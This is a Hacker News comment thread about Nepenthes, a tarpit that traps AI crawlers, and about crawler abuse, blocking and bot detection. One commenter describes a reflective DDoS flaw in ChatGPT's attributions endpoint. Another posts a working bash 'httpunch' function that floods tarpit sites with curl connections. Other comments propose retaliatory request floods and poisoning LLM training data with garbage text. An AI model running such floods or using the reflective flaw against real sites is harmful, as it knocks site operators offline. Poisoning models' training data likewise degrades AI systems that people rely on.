
Nepenthes is a tarpit to catch AI web crawlers

508 points | 20 hours ago | zadzmo.org
bflesch18 hours ago

Haha, this would be an amazing way to test the ChatGPT crawler reflective DDOS vulnerability [1] I published last week.

Basically, a single HTTP request to the ChatGPT API can trigger 5000 HTTP requests from the ChatGPT crawler to a victim website.

The vulnerability is/was thoroughly ignored by OpenAI/Microsoft/BugCrowd, but I really wonder what would happen if the ChatGPT crawler interacted with this tarpit several times per second. As the ChatGPT crawler uses various Azure IP ranges, I actually think the tarpit would crash first.

The vulnerability reporting experience with OpenAI / BugCrowd was really horrific. It's always difficult to get attention for DoS/DDoS vulnerabilities, and companies always act like they are not a problem. But if their system goes dark and the CEO calls, then suddenly they accept it as a security vulnerability.

I spent a week trying to reach OpenAI/Microsoft to get this fixed, but I gave up and just published the writeup.

I don't recommend exploiting this vulnerability, for legal reasons.

[1] https://github.com/bf/security-advisories/blob/main/2025-01-...

hassleblad2317 hours ago

I am not surprised that OpenAI is not interested in fixing this.

bflesch17 hours ago

Their security.txt email address replies and asks you to go on BugCrowd. BugCrowd staff is unwilling (or too incompetent) to run a bash curl command to reproduce the issue, while also refusing to forward it to OpenAI.

The support@openai.com address waits an hour before answering with a ChatGPT-generated answer.

Issues raised on GitHub directly towards their engineers were not answered.

Also, Microsoft CERT and the Azure security team do not reply or care to respond to such things (maybe due to lack of demonstrated impact).

permo-w15 hours ago

why try this hard for a private company that doesn't employ you?

manquer9 hours ago

While others (and OP) give good reasons beyond passion and interest, those I see are typically doing this without a bounty to build a public profile and establish a reputation that helps with employment or with building a devsecops consulting practice.

Unlike clear-cut security issues like RCEs, (D)DoS, and social engineering, a few other classes of issues are hard for devsecops teams to process: they are a matter of product design, beyond the control of engineering.

Say, for example, you offer 2FA but do not require users to enable it: with known passwords for some usernames from other leaks, or a rainbow table, an attacker can exploit poorly locked-down accounts.

Similarly, many dev tools and data stores, for ease of adoption of their cloud offerings, are open by default (i.e. no authentication, publicly reachable) or are so easy to misconfigure that even a simple scan on Shodan would show them. On a philosophical level these are security issues in product design, perhaps, but no company would accept them as security vulnerabilities; thankfully this type of issue is becoming less common these days.

When your inbox starts filling up with people reporting items like this to improve their cred, you stop engaging, because the product teams will not accept them and you cannot do anything about it. Sooner or later devsecops teams tend to outsource the initial filtering to bug bounty programs, and those obviously do not do a great job of responding, especially when it is one of the grayer categories.

myself24814 hours ago

Maybe it's wrecking a site they maintain or care about.

Brian_K_White59 minutes ago

At least one time it's worth going through all the motions to prove whether it is or is not actually functional, so that they can not say "no one reported a problem..." about all the problems.

You can't say they don't have a functional process, and that they are lying or disingenuous when they claim to, if you never actually tried it for real yourself at least once.

inetknght15 hours ago

Some people have passion.

khana2 hours ago

[dead]

JohnMakin17 hours ago

Nice find, I think one of my sites actually got recently hit by something like this. And yea, this kind of thing should be trivially preventable if they cared at all.

zanderwohl11 hours ago

IDK, I feel that if you're doing 5000 HTTP calls to another website it's kind of good manners to fix that. But OpenAI has never cared about the public commons.

marginalia_nu11 hours ago

Yeah, even beyond common decency, there's pretty strong incentives to fix it, as it's a fantastic way of having your bot's fingerprint end up on Cloudflare's shitlist.

dewey17 hours ago

> And yea, this kind of thing should be trivially preventable if they cared at all.

When someone says something is "trivial" without knowing anything about the internals, it's almost never trivial.

As someone working close to the b2c side of a business, I can't count the number of times I've heard that something should be trivial while it's something we've thought about for years.

bflesch16 hours ago

The technical flaws are quite trivial to spot, if you have the relevant experience:

- urls[] parameter has no size limit

- urls[] parameter is not deduplicated (but their cache is deduplicating, so this security control was there at some point but is ineffective now)

- their requests to the same website / DNS / victim IP address rotate through all available Azure IPs, which puts them at risk of being blocked by other hosters. They should come from the same IP address. I noticed them changing to other Azure IP ranges several times, most likely because they got blocked/rate-limited by Hetzner or the other providers from which I was playing around with this vulnerability.

But if their team is too limited to recognize security risks, there is nothing one can do. Maybe they were occupied last week with the office gossip around the sexual assault lawsuit against Sam Altman. Maybe they still had holidays or there was another, higher-risk security vulnerability.

Having interacted with several bug bounty programs in the past, it feels like OpenAI is not very mature in that regard. Also, why did they choose BugCrowd when HackerOne is much better, in my experience?

fc417fc80216 hours ago

> rotate through all available Azure IPs, ... They should come from the same IP address.

I would guess that this is intentional, intended to prevent IP level blocks from being effective. That way blocking them means blocking all of Azure. Too much collateral damage to be worth it.

grahamj16 hours ago

If you’re unable to throttle your own outgoing requests you shouldn’t be making any

jillyboel14 hours ago

now try to reply to the actual content instead of some generalizing grandstanding bullshit

michaelbuckbee17 hours ago

What is the https://chatgpt.com/backend-api/attributions endpoint doing (or responsible for) when not crushing websites?

bflesch17 hours ago

When ChatGPT cites web sources in its output to the user, it will call `backend-api/attributions` with the URL, and the API will return what the website is about.

Basically it does an HTTP request to fetch the HTML `<title/>` tag.

They don't check the length of the supplied `urls[]` array, and they also don't check if it contains the same URL over and over again (with minor variations).

It's just bad engineering all around.

bentcorner13 hours ago

Slightly weird that this even exists - shouldn't the backend generating the chat output know what attribution it needs, and just ask the attributions api itself? Why even expose this to users?

JohnMakin15 hours ago

Even if you were unwilling to change this behavior at the application layer or server side, you could add a directive in the proxy to reject such large payloads as an immediate mitigation step, unless they seriously need that parameter to accept an unlimited number of URLs (I'm guessing they have it set to some default like 2 MB and it will break at some limit, but I am afraid to play with this too much). Somehow I doubt they need that? I don't know though.
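For illustration, a minimal sketch of that kind of proxy-side cap, assuming an nginx reverse proxy in front of the API; the location path matches the endpoint discussed here, but the 16k limit and the `app_backend` upstream name are made up:

    # Reject oversized request bodies before they reach the application, so an
    # over-stuffed urls[] array gets a 413 instead of triggering thousands of fetches.
    location /backend-api/attributions {
        client_max_body_size 16k;
        proxy_pass http://app_backend;
    }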

dangoodmanUT8 hours ago

has anyone tested this working? I get a 301 in my terminal trying to send a request to my site

bflesch2 hours ago

Hopefully they'd have it fixed by now. The magic of HN exposure...

mitjam6 hours ago

How can it reach localhost or is this only a placeholder for a real address?

bflesch2 hours ago

The code in the github repo has some errors to prevent script kiddies from directly copy/pasting it.

Obviously the proof-of-concept shared with OpenAI/BugCrowd didn't have such errors.

soupfordummies17 hours ago

Try it and let us know :)

m304714 hours ago

Having first run a bot motel in I think 2005, I'm thrilled and greatly entertained to see this taking off. When I first did it, I had crawlers lost in it literally for days; and you could tell that eventually some human would come back and try to suss the wreckage. After about a year I started seeing URLs like ../this-page-does-not-exist-hahaha.html. Sure it's an arms race but just like security is generally an afterthought these days, don't think that you can't be the woodpecker which destroys civilization. The comments are great too, this one in particular reflects my personal sentiments:

> the moment it becomes the basic default install ( ala adblocker in browsers for people ), it does not matter what the bigger players want to do

a_c39 minutes ago

We need a tarpit that feeds AI their own hallucinations. Make the Habsburg dynasty of AI a reality.

Cthulhu_12 minutes ago

There was an article about that the other day having to do with image generation, and while it didn't exactly create Habsburg chins there were definite problems after a few generations. I can't find it though :/

taikahessu19 hours ago

We had our non-profit website drained of bandwidth and the site temporarily closed (!!) under our hosting deal because of the Amazon bot aggressively crawling URLs like ?page=21454 ... etc.

Thankfully SiteGround restored our site without any repercussions, as it was not our fault. We added the Amazon bot to robots.txt after that one.

I don't like how things are right now. Is a tarpit the solution? Or better laws? Would they stop the Chinese bots? Should they even? I don't know.

mrweasel56 minutes ago

> We had our non-profit website drained out of bandwidth

There are a number of sites having issues with scrapers (AI and others) generating so much traffic that transit providers are informing them their fees will go up with the next contract renewal if the traffic is not reduced. It's just very hard for the individual sites to do much about it, as most of the traffic stems from AWS, GCP, or Azure IP ranges.

It is a problem and the AI companies do not care.

jsheard18 hours ago

For the "good" bots which at least respect robots.txt you can use this list to get ahead of them before they pummel your site.

https://github.com/ai-robots-txt/ai.robots.txt
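As a sketch of what applying that list looks like in practice, here is the robots.txt shape; the user agents below are a small hand-picked subset of well-known AI crawlers and may not match the list's current contents:

    # robots.txt
    User-agent: GPTBot
    User-agent: ClaudeBot
    User-agent: CCBot
    User-agent: Google-Extended
    User-agent: PerplexityBot
    Disallow: /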

There's no easy solution for bad bots which ignore robots.txt and spoof their UA though.

breakingcups13 hours ago

Such as OpenAI, who will ignore robots.txt and change their user agent to evade blocks, apparently[1]

1: https://www.reddit.com/r/selfhosted/comments/1i154h7/openai_...

zcase11 hours ago

For those looking, this is the best I've found: https://blog.cloudflare.com/declaring-your-aindependence-blo...

maeil3 hours ago

This seemed to work for some time when it came out but IME no longer does.

taikahessu18 hours ago

Thanks, will look into that!

dspillett18 hours ago

Tarpits to slow down the crawling may stop them crawling your entire site, but they'll not care unless a great many sites do this. Your site will be assigned a thread or two at most, and the rest of the crawling machine's resources will be off scanning other sites. There will be timeouts to stop a particular site from keeping even a couple of cheap threads busy for long. And anything like this may get you delisted from search results you might want to be in, as it can be difficult to reliably distinguish these bots from others, and sometimes even from real users; and if things like this get good enough to be any hassle to the crawlers, they'll just start lying (more) and be even harder to detect.

People scraping for nefarious reasons have had decades of other people trying to stop them, so mitigation techniques are well known unless you can come up with something truly unique.

I don't think random Markov chain based text generators are going to pose much of a problem to LLM training scrapers either. They'll have rate limits and vast attention spreading too. Also I suspect that random pollution isn't going to have as much effect as people think because of the way the inputs are tokenised. It will have an effect, but this will be massively dulled by the randomness – statistically relatively unique information and common (non random) combinations will still bubble up obviously in the process.

I think better would be to have less random pollution: use a small set of common text to pollute the model. Something like “this was a common problem with Napoleonic genetic analysis due to the pre-frontal nature of the ongoing stream process, as is well documented in the grimoire of saint Churchill the III, 4th edition, 1969”, in fact these snippets could be Markov generated, but use the same few repeatedly. They would need to be nonsensical enough to be obvious noise to a human reader, or highlighted in some way that the scraper won't pick up on, but a general intelligence like most humans would (perhaps a CSS styled side-note inlined in the main text? — though that would likely have accessibility issues), and you would need to cycle them out regularly or scrapers will get “smart” and easily filter them out, but them appearing fully, numerous times, might mean they have more significant effect on the tokenising process than more entirely random text.

hinkley10 hours ago

If it takes them 100 times the average crawl time to crawl my site, that is an opportunity cost to them. Of course 'time' is fuzzy here because it depends how they're batching. The way most bots work is to pull a fixed number of replies in parallel per target, so if you double your response time then you halve the number of requests per hour they slam you with. That definitely affects your cluster size.

However, if they split ask and answer, or other threads for other sites can use the same CPUs while you're dragging your feet returning a reply, then as you say, just IO delays won't slow them down. You've got to use their CPU time as well. That won't be accomplished by IO stalls on your end, but could potentially be done by adding some highly compressible gibberish on the sending side, so that you create more work without proportionately increasing your bandwidth bill. But that could be tough to do without increasing your CPU bill.
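As a rough illustration of how lopsided that trade can be (exact numbers will vary), repetitive filler compresses extremely well, so the bytes you actually send are tiny compared to what the client has to decompress and chew through:

    # ~10 MB of repetitive filler text gzips down to a few tens of kilobytes
    yes "all work and no play makes Jack a dull boy" | head -c 10485760 | gzip -9 | wc -c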

larsrc13 hours ago

I've been considering setting up "ConfuseAIpedia" in a similar manner using sentence templates and a large set of filler words. Obviously with a warning for humans. I would set it up with an appropriate robots.txt blocking crawlers so only unethical crawlers would read it. I wouldn't try to tarpit beyond protecting my own server, as confusing rogue AI scrapers is more interesting than slowing them down a bit.

dzhiurgis13 hours ago

Can you put some topic in the tarpit that you don't want LLMs to learn about? Say, put a bunch of info about a competitor so that it learns to avoid it?

quchen19 hours ago

Unless this concept becomes a mass phenomenon with many implementations, isn’t this pretty easy to filter out? And furthermore, since this antagonizes billion-dollar companies that can spin up teams doing nothing but browse Github and HN for software like this to prevent polluting their datalakes, I wonder whether this is a very efficient approach.

marcus0x6218 hours ago

Author of a similar tool here[0]. There are a few implementations of this sort of thing that I know of. Mine is different in that the primary purpose is to slightly alter content statically using a Markov generator, mainly to make it useless for content reposters, secondarily to make it useless to LLM crawlers that ignore my robots.txt file[1]. I assume the generated text is bad enough that the LLM crawlers just throw the result out. Other than the extremely poor quality of the text, my tool doesn't leave any fingerprints (like recursive non-sense links.) In any case, it can be run on static sites with no server-side dependencies so long as you have a way to do content redirection based on User-Agent, IP, etc.

My tool does have a second component - linkmaze - which generates a bunch of nonsense text with a Markov generator, and serves infinite links (like Nepenthes does), but I generally only throw incorrigible bots at it (and, as others have noted in-thread, most crawlers already set some kind of limit on how many requests they'll send to a given site, especially a small site.) I do use it for PHP-exploit crawlers as well, though I've seen no evidence those fall into the maze -- I think they mostly just look for some string indicating a successful exploit and move on if whatever they're looking for isn't present.

But, for my use case, I don't really care if someone fingerprints content generated by my tool and avoids it. That's the point: I've set robots.txt to tell these people not to crawl my site.

In addition to Quixotic (my tool) and Nepenthes, I know of:

* https://github.com/Fingel/django-llm-poison

* https://codeberg.org/MikeCoats/poison-the-wellms

* https://codeberg.org/timmc/marko/

0 - https://marcusb.org/hacks/quixotic.html

1 - I use the ai.robots.txt user agent list from https://github.com/ai-robots-txt/ai.robots.txt

btilly19 hours ago

It would be more efficient for them to spin up a team to study this robots.txt thing. They've ignored that low hanging fruit, so they won't do the more sophisticated thing any time soon.

tgv18 hours ago

You can't make money out of studying robots.txt, but you can avoid costs by skipping bad websites.

xeromal14 hours ago

Sounds like a benefit for the site owner. lol. It accomplished what they wanted.

iugtmkbdfil83415 hours ago

I forget which fiction book covered this phenomenon ( Rainbow's End? ), but the moment it becomes the basic default install ( ala adblocker in browsers for people ), it does not matter what the bigger players want to do ; they are not actively fighting against determined and possibly radicalized users.

reedf118 hours ago

The idea is that you place this in parallel to the rest of your website routes, that way your entire server might get blacklisted by the bot.

WD-4217 hours ago

Does it need to be efficient if it’s easy? I wrote a similar tool except it’s not a performance tarpit. The goal is to slightly modify otherwise organic content so that it is wrong, but only for AI bots. If they catch on and stop crawling the site, nothing is lost. https://github.com/Fingel/django-llm-poison

focusedone19 hours ago

But it's fun, right?

grajaganDev19 hours ago

I am not sure. How would crawlers filter this?

captainmuon19 hours ago

Check if the response time, the length of the "main text", or other indicators are in the lowest few percentile -> send to the heap for manual review.

Does the inferred "topic" of the domain match the topic of the individual pages? If not -> manual review. And there are many more indicators.

Hire a bunch of student jobbers, have them search github for tarpits, and let them write middleware to detect those.

If you are doing broad crawling, you already need to do this kind of thing anyway.
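For the response-time signal specifically, a minimal crawler-side sketch might look like this; the urls.txt input and the 2-second cutoff are arbitrary choices for illustration:

    # Fetch each URL, record curl's total transfer time, and flag slow ones for review.
    THRESHOLD=2.0
    while read -r url; do
      t=$(curl -s -o /dev/null --max-time 30 -w '%{time_total}' "$url")
      if awk -v t="$t" -v th="$THRESHOLD" 'BEGIN { exit !(t > th) }'; then
        echo "SLOW ($t s): $url"   # candidate for the manual-review heap
      fi
    done < urls.txt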

dylan60417 hours ago

> Hire a bunch of student jobbers,

Do people still do this, or do they just off shore the task?

marginalia_nu19 hours ago

You limit the crawl time or number of requests per domain for all domains, and set the limit proportional to how important the domain is.

There's a ton of these types of things online; you can't, e.g., exhaustively crawl every Wikipedia mirror someone's put online.

pmarreck14 hours ago

It's not. It's rather pointless and, frankly, nearsighted. And we can DDoS sites like this just as offensively, simply by making many requests to them: its own docs say its Markov generation is computationally expensive, but it is NOT expensive for even one person to make many requests to it. It's just expensive to host. So feel free to use this bash function to defeat these:

    httpunch() {
      local url=$1
      local connections=${2:-${HTTPUNCH_CONNECTIONS:-100}}
      local action=$1
      local keepalive_time=${HTTPUNCH_KEEPALIVE:-60}
      local silent_mode=false

      # Check if "kill" was passed as the first argument
      if [[ $action == "kill" ]]; then
        echo "Killing all curl processes..."
        pkill -f "curl --no-buffer"
        return
      fi

      # Parse optional --silent argument
      for arg in "$@"; do
        if [[ $arg == "--silent" ]]; then
          silent_mode=true
          break
        fi
      done

      # Ensure URL is provided if "kill" is not used
      if [[ -z $url ]]; then
        echo "Usage: httpunch [kill | <url>] [number_of_connections] [--silent]"
        echo "Environment variables: HTTPUNCH_CONNECTIONS (default: 100), HTTPUNCH_KEEPALIVE (default: 60)."
        return 1
      fi

      echo "Starting $connections connections to $url..."
      for ((i = 1; i <= connections; i++)); do
        if $silent_mode; then
          curl --no-buffer --silent --output /dev/null --keepalive-time "$keepalive_time" "$url" &
        else
          curl --no-buffer --keepalive-time "$keepalive_time" "$url" &
        fi
      done

      echo "$connections connections started with a keepalive time of $keepalive_time seconds."
      echo "Use 'httpunch kill' to terminate them."
    }
(Generated in a few seconds with the help of an LLM of course.) Your free speech is also my free speech. LLM's are just a very useful tool, and Llama for example is open-source and also needs to be trained on data. And I <opinion> just can't stand knee-jerk-anticorporate AI-doomers who decide to just create chaos instead of using that same energy to try to steer the progress </opinion>.
WD-4213 hours ago

You called the parent unintelligent yet need an LLM to show you how to run curl in a loop. Yikes.

flir4 minutes ago

"I'm not lazy, I'm efficient" - Heinlein

scudsworth9 hours ago

"Ah, my favorite ADD tech nomad! adjusts monocle"

- https://gist.github.com/pmarreck/970e5d040f9f91fd9bce8a4bcee...

Blackthorn19 hours ago

If it means it makes your own content safe when you deploy it on a corner of your website: mission accomplished!

gruez18 hours ago

>If it means it makes your own content safe

Not really? As mentioned by others, such tarpits are easily mitigated by using a priority queue. For instance, crawlers can prioritize external links over internal links, which means if your blog post makes it to HN, it'll get crawled ahead of the tarpit. If it's discoverable and readable by actual humans, AI bots will be able to scrape it.

TeMPOraL17 hours ago

[flagged]

Blackthorn16 hours ago

You've got to be seriously AI-drunk to equate letting your site be crawled by commercial scrapers with "contributing to humanity".

Maybe you don't want your stuff to get thrown into the latest silicon valley commercial operation without getting paid for it. That seems like a valid position to take. Or maybe you just don't want Claude's ridiculously badly behaved scraper to chew through your entire budget.

Regardless, scrapers that don't follow the rules like robots.txt pretty quickly will discover why those rules exist in the first place as they receive increasing amounts of garbage.

benlivengood13 hours ago

A little humorous; it's a 502 Bad Gateway error right now and I don't know if I am classified as an AI web crawler or it's just overloaded.

marginalia_nu11 hours ago

The reason these types of slow-response tarpits aren't recommended is that you're basically building an instrument for denial of service for your own website. What happens is the server is the one that ends up holding a bunch of slow connections, many more so than any given client.

hartator19 hours ago

There are already “infinite” websites like these on the Internet.

Crawlers (both AI and regular search) have a set number of pages they want to crawl per domain. This number is usually determined by the popularity of the domain.

Unknown websites will get very few crawls per day whereas popular sites millions.

Source: I am the CEO of SerpApi.

dawnerd17 hours ago

Looking at my logs for all of my sites, this isn't a global truth. I see multiple AI crawlers hammering away, requesting the same pages many, many times. Perplexity and Facebook are basically nonstop.

jonatron17 hours ago

I just looked at the logs for a site, and I saw PerplexityBot is looking at the robots.txt and ignoring it. They don't provide a list of IPs to verify if it is actually them. Anyway, just for anyone with PerplexityBot in their user agent, they can get increasingly bad responses until the abuse stops.

dawnerd15 hours ago

Perplexity is exceptionally bad because they say they respect robots.txt but clearly don't. When pressed on it they basically shrug and say too bad, don't put stuff in public if you don't want it crawled. They got a UA block in Cloudflare and that seems to have done the trick.

TeMPOraL10 hours ago

Interesting. Now they seem to claim that not only do they follow robots.txt for crawling, but that they also broke under pressure and made the unfortunate decision to have user requests follow robots.txt too.

https://www.perplexity.ai/de/hub/technical-faq/how-does-perp...

Dwedit15 hours ago

User Agent block just means they'd spoof their user agent.

hartator15 hours ago

What do you mean by many, many times?

palmfacehn17 hours ago

Even a brand new site will get hit heavily by crawlers. Amazonbot, Applebot, LLM bots, scrapers abusing FB's link preview bot, SEO metric bots and more than a few crawlers out of China. The desirable, well behaved crawlers are the only ones who might lose interest.

The typical entry point is a sitemap or RSS feed.

Overall I think the author is misguided in using the tarpit approach. Slow sites get less crawls. I would suggest using easily GZIP'd content and deeply nested tags instead. There are also tricks with XSL, but I doubt many mature crawlers will fall for that one.

marginalia_nu19 hours ago

Yeah, I agree with this. These types of roach motels have been around for decades and are at this point well understood and not much of a problem for anyone. You basically need to be able to deal with them to do any sort of large scale crawling.

The reality of web crawling is that the web is already extremely adversarial and any crawler will get every imaginable nonsense thrown at it, ranging from various TCP tar pits, compression and XML bombs, really there's no end to what people will put online.

A more resource effective technique to block misbehaving crawlers is to have a hidden link on each page, to some path forbidden via robots.txt, randomly generated perhaps so they're always unique. When that link is fetched, the server immediately drops the connection and blocks the IP for some time period.
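A rough sketch of that trap, assuming an nginx access log in the default combined format; the trap path, log location, and one-hour ban are all arbitrary, and the iptables calls need root:

    # Watch the access log for hits on a path that robots.txt forbids,
    # then drop all traffic from the offending IP for an hour.
    TRAP_PATH="/trap/"
    BAN_SECONDS=3600

    tail -F /var/log/nginx/access.log | while read -r line; do
      case "$line" in
        *"GET ${TRAP_PATH}"*)
          ip=${line%% *}        # client IP is the first field of a combined-format line
          echo "banning $ip"
          iptables -I INPUT -s "$ip" -j DROP
          ( sleep "$BAN_SECONDS"; iptables -D INPUT -s "$ip" -j DROP ) &
          ;;
      esac
    done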

pilif18 hours ago

> Unknown websites will get very few crawls per day whereas popular sites millions.

we're hosting some pretty unknown, very domain-specific sites and are getting hammered by Claude and others who, compared to old-school search engine bots, also get caught up in the weeds and request the same pages over and over.

They also seem to not care about response time of the page they are fetching, because when they are caught in the weeds and hit some super bad performing edge-cases, they do not seem to throttle at all and continue to request at 30+ requests per second even when a page takes more than a second to be returned.

We can of course handle this and make them go away, but in the end, this behavior will only hurt them both because they will face more and more opposition by web masters and because they are wasting their resources.

For decades, our solution for search engine bots was basically an empty robots.txt and have the bots deal with our sites. Bots behaved reasonably and intelligently enough that this was a working strategy.

Now in light of the current AI bots which from an outsider observer's viewpoint look like they were cobbled together with the least effort possible, this strategy is no longer viable and we would have to resort to provide a meticulously crafted robots.txt to help each hacked-up AI bot individually to not get lost in the weeds.

Or, you know, we just blanket ban them.

kccqzy16 hours ago

The fact that AI bots seem like they were cobbled together with the least effort possible might be related. The people responsible for these bots might have zero experience writing an old school search engine bot and have no idea of the kind of edge cases that would be encountered. They might just turn to LLMs to write their bot code which is not exactly a recipe for success.

diggan19 hours ago

> There are already “infinite” websites like these on the Internet.

Cool. And how much of the software driving these websites is FOSS and I can download and run it for my own (popular enough to be crawled more than daily by multiple scrapers) website?

johnisgood9 hours ago

How is that infinite if the last one is always the same? Am I misunderstanding this? I assumed it is almost like an infinite scroll or something.

diggan18 hours ago

Aren't those finite lists? How is a scraper (normal or LLM) supposed to "get stuck" on those?

hartator18 hours ago

Every not-found page that doesn't return a 404 HTTP status is basically an infinite trap.

It’s useless to do this though as all crawlers have a way to handle this. It’s very crawler 101.

angoragoats16 hours ago

This may be true for large, established crawlers for Google, Bing, et al. I don’t see how you can make this a blanket statement for all crawlers, and my own personal experience tells me this isn’t correct.

marginalia_nu11 hours ago

These things are so common having some way of dealing with them is basically mandatory if you plan on doing any sort of large scale crawling.

That said, crawlers are fairly bug prone, so misbehaving crawlers is also a relatively common sight. It's genuinely difficult to properly test a crawler, and useless to build it from specs, since the realities of the web are so far off the charted territory, any test you build is testing against something that's far removed from what you'll actually encounter. With real web data, the corner cases have corner cases, and the HTTP and HTML specs are but vague suggestions.

angoragoats11 hours ago

I am aware of all of the things you mention (I've built crawlers before).

My point was only that there are plenty of crawlers that don't operate in the way the parent post described. If you want to call them buggy that's fine.

p0nce16 hours ago

Brand new site with no user gets 1k request a month by bots, the CO2 cost must be atrocious.

tivert13 hours ago

> Brand new site with no user gets 1k request a month by bots, the CO2 cost must be atrocious.

Yep: https://www.energy.gov/articles/doe-releases-new-report-eval...:

> The report finds that data centers consumed about 4.4% of total U.S. electricity in 2023 and are expected to consume approximately 6.7 to 12% of total U.S. electricity by 2028. The report indicates that total data center electricity usage climbed from 58 TWh in 2014 to 176 TWh in 2023 and estimates an increase between 325 to 580 TWh by 2028.

A graph in the report says data centers used 1.9% in 2018.

qwe----317 hours ago

This certainly violates the TOS for using Google.

swyx16 hours ago

what does this have to do with google?

dilDDoS8 hours ago

I appreciate the intent behind this, but like others have pointed out, this is more likely to DoS your own website than accomplish the true goal.

Probably unethical or not possible, but you could maybe spin up a bunch of static pages on GitHub Pages with random filler text and then have your site redirect to a random one of those instead. Unless web crawlers don’t follow redirects.

hubraumhugo14 hours ago

The arms race between AI bots and bot-protection is only going to get worse, leading to increasing infra costs while negatively impacting the UX and performance (captchas, rate limiting, etc.).

What's a reasonable way forward to deal with more bots than humans on the internet?

readyplayernull14 hours ago

It's time to level up in this arms race. Let's stop delivering html documents, use animated rendering of information that is positioned in a scene so that the user has to move elements around for it to be recognizable, like a full site captcha. It doesn't need to be overly complex for the user that can intuitively navigate even a 3D world, but will take x1000 more processing for OpenAI. Feel free to come up with your creative designs to make automation more difficult.

RamblingCTO3 hours ago

Why wouldn't a max-depth (which I always implement in my crawlers if I write any) prevent any issues you'd have? Am I overlooking something? Or does it run under the assumption that the crawlers they are targeting are so greedy that they don't have max-depth/a max number of pages for a domain?
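For what it's worth, even off-the-shelf tools expose exactly that kind of limit; a polite recursive fetch with wget might look like this, with the depth and delay values picked arbitrarily:

    # Hard depth limit plus a politeness delay, so an infinite-link tarpit
    # can only ever cost a bounded number of requests.
    wget --recursive --level=3 --wait=1 --random-wait \
         --user-agent="example-crawler/0.1" https://example.com/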

grajaganDev19 hours ago

This keeps generating new pages to keep the crawler occupied.

Looks like this would tarpit any web crawler.

BryantD19 hours ago

It would indeed. Note the warning: "There is not currently a way to differentiate between web crawlers that are indexing sites for search purposes, vs crawlers that are training AI models. ANY SITE THIS SOFTWARE IS APPLIED TO WILL LIKELY DISAPPEAR FROM ALL SEARCH RESULTS."

jsheard19 hours ago

Real search engines respect robots.txt so you could just tell them not to enter Markov Chain Hell.

throwaway74467819 hours ago

I suspect AI crawlers would (quickly learn to) respect it too?

jsheard19 hours ago

In that case, mission accomplished.

rvnx19 hours ago

It's actually a great way to spread malware without leaving traces too: it makes content inspection very difficult and breaks view-source:, most debugging tools, saving to .har, etc.

bugtodiffer19 hours ago

how is view source broken

rvnx19 hours ago

It waits for the whole page to load

upwardbound23 hours ago

Is Nepenthes being mirrored in enough places to keep the community going if the original author gets any DMCA trouble or anything? I'd be happy to host a mirror but am pretty busy and I don't want to miss a critical file by accident.

upwardbound23 hours ago

It looks like someone saved a copy of the downloads page and the three linked files in the wayback machine yesterday, so that's good at least. https://web.archive.org/web/20250000000000*/https://zadzmo.o...

btbuildem18 hours ago

> ANY SITE THIS SOFTWARE IS APPLIED TO WILL LIKELY DISAPPEAR FROM ALL SEARCH RESULTS

Bug, or feature, this? Could be a way to keep your site public yet unfindable.

chaara-dev18 hours ago

You can already do this with a robots.txt file

btbuildem17 hours ago

Technically speaking, yes - but it's in no way enforced, as far as I understand it's more of an honour system.

This malicious solution aligns with incentives (or, disincentives) of the parasitic actors, and might be practically more effective.

NathanKP17 hours ago

This looks extremely easy to detect and filter out. For example: https://i.imgur.com/hpMrLFT.png

In short, if the creator of this thinks that it will actually trick AI web crawlers, in reality it would take about 5 minutes to write a simple check that filters it out and bans the site from crawling. With modern LLM workflows it's actually fairly simple and cheap to burn just a little bit of GPU time to check if the data you are crawling is decent.

Only a really, really bad crawl bot would fall for this. The funny thing is that in order to make something that an AI crawler bot would actually fall for you'd have to use LLM's to generate realistic enough looking content. Markov chain isn't going to cut it.

slongfield9 hours ago

The most annoying bots are the ones that mindlessly slam sites over and over, without doing any filtering. Having these kinds of tarpits out in the wild forcing people to be better behaved with their crawling bots is a feature, not a bug.

canu714 hours ago

If they need to query a trained LLM for each page they crawl, I would guess that the training cost would scale up pretty badly...

NathanKP13 hours ago

Of course you wouldn't do it for every single page. If I was designing this crawler I'd make it sample a percentage of pages, starting at 100% sample rate for a completely unknown website, decreasing the sample rate over time as more "good" pages are found relative to "bad" pages.

After a "good" page percentage threshold is exceeded, stop sampling entirely and just crawl, assuming that all content is good. After a "bad" page percentage threshold is exceeded just stop wasting your time crawling that domain entirely.

With modern models the sampling cost should be quite cheap, especially since Nepenthes has a really small page size. Now if the page were humongous, that might make it harder and more expensive to put through an LLM.
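A toy sketch of that policy in shell form; the 50% and 90% thresholds are invented for illustration:

    # Decide how to treat a domain from running counts of sampled "good" and
    # "bad" pages: sample everything at first, crawl freely once the site looks
    # clean, abandon it once it looks like a tarpit.
    decide_crawl_mode() {
      local good=$1 bad=$2
      local total=$((good + bad))
      if (( total == 0 )); then echo "sample"; return; fi
      local bad_pct=$(( 100 * bad / total ))
      local good_pct=$(( 100 * good / total ))
      if   (( bad_pct  >= 50 )); then echo "abandon"
      elif (( good_pct >= 90 )); then echo "crawl"
      else                            echo "sample"
      fi
    }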

krior2 hours ago

> After a "bad" page percentage threshold is exceeded just stop wasting your time crawling that domain entirely.

In the words of Bush jr.: Mission accomplished!

ycombinatrix2 hours ago

So this is basically endlessh for HTTP? Why not feed AI web crawlers with nonsense information instead?

pera19 hours ago

Does anyone know if there is anything like Nepenthes but that implements data poisoning attacks like https://arxiv.org/abs/2408.02946

gruez18 hours ago

I skimmed the paper and the gist seems to be: if you fine-tune a foundation model on bad training data, the resulting model will produce bad outputs. That seems... expected? This makes as much sense as "if you add vulnerable libraries to your app, your app will be vulnerable". I'm not sure how this can turn into an actual attack though.

griomnib10 hours ago

A simpler approach I’m considering is just sending 100 garbage HTTP requests for each garbage HTTP request they send me. You could just have a cron job parse the user agents from access logs once an hour and blast the bastards.

nerdix13 hours ago

Are the big players (minus Google since no one blocks google bot) actively taking measures to circumvent things like Cloudflare bot protection?

Bot detection is fairly sophisticated these days. No one bypasses it by accident. If they are getting around it then they are doing it intentionally (and probably dedicating a lot of resources to it). I'm pro-scraping when bots are well behaved but the circumvention of bot detection seems like a gray-ish area.

And, yes, I know about Facebook training on copyrighted books so I don't put it above these companies. I've just never seen it confirmed that they actually do it.

luckylion13 hours ago

Not that I've seen it.

If you enable Cloudflare Captcha, you'll see basically no more bots, only the most persistent remain (that have an active interest in you/your content and aren't just drive-by-hits).

It's just that having the brief interception hurts your conversion rate. Might depend on industry, but we saw 20-30% drops in page views and conversions which just makes it a nuclear option when you're under attack, but not something to use just to block annoyances.

sedatk4 hours ago

Both ChatGPT 4o and Claude 3.5 Sonnet can identify the generated page content as "random words".

marckohlbrugge17 hours ago

OpenAI doesn’t take security seriously.

I reported a vulnerability to them that allowed you to get IP addresses of their paying customers.

